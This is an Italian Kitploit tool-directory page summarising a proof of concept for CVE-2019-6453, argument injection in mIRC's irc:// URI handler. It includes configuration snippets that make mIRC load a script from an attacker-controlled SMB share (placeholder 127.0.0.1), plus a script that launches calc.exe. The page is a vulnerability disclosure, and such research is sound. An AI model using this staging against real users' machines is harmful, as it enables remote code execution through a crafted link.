Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2019-6453-poc — Prova di calcolo per CVE-2019-6453 | Kitploit
Strumenti/GitHubGitHub/proofofcalc/cve-2019-6453-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubproofofcalc/cve-2019-6453-poc

cve-2019-6453-poc

Prova di calcolo per CVE-2019-6453

Vedi Repository
48122 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-6453: RCE su mIRC <7.55 mediante injection di argomenti attraverso gestori di protocollo URI personalizzati

Abbiamo trovato una vulnerabilità di Remote Code Execution in mIRC attraverso il gestore di protocollo URI irc://. Poiché mIRC non utilizza alcun tipo di segnaposto come -- per segnare la fine della lista degli argomenti, un attaccante può passare argomenti a mIRC tramite un collegamento irc:// ed eseguire codice arbitrario caricando un mirc.ini personalizzato da un file server Samba controllato dall'attaccante. Si noti che ircs:// funziona allo stesso modo.

PoC

La prova di calc richiede tre file: mirc.ini, calc.ini e poc.html. Supponiamo che un file server Samba sia in esecuzione dalla parte dell'attaccante. Ai fini dell'esempio, i seguenti frammenti di codice assumono che sia in esecuzione sull'host 127.0.0.1 (ovvero sostituisci 127.0.0.1 con l'indirizzo del tuo server nei file seguenti per provare).

mirc.ini

mirc.ini è un file di configurazione personalizzato che dovrebbe trovarsi in C:\mirc-poc\mirc.ini sul file server.

root@kitploit:~
[rfiles]
n2=\\127.0.0.1\C$\mirc-poc\calc.ini

calc.ini

calc.ini è un file script remoto che dovrebbe trovarsi in C:\mirc-poc\calc.ini sul file server.

root@kitploit:~
[script]
n0=on *:START: {
n1=  /run calc.exe
n2=}

poc.html

Semplicemente visitare poc.html dovrebbe funzionare assumendo che mIRC sia impostato come gestore predefinito per lo schema URI irc:// e che il browser non codifichi il payload. A seconda del browser e della tua configurazione, potresti comunque ricevere un prompt (non è il caso di Firefox).

root@kitploit:~

PoC gif

PoC gif

Versioni affette

Questa PoC funziona per mIRC <7.55.

Puoi attivare la PoC su Edge 42.17134 (ultima versione preview) e Firefox 64.0.2 (ultima release). Non funziona su Chrome per il modo in cui Chrome gestisce i protocolli URI (l'URI viene codificato prima di essere passato all'applicazione).

Autori

  • Baptiste Devigne (Geluchat) e Benjamin Chetioui (SIben)
Scarica lo strumento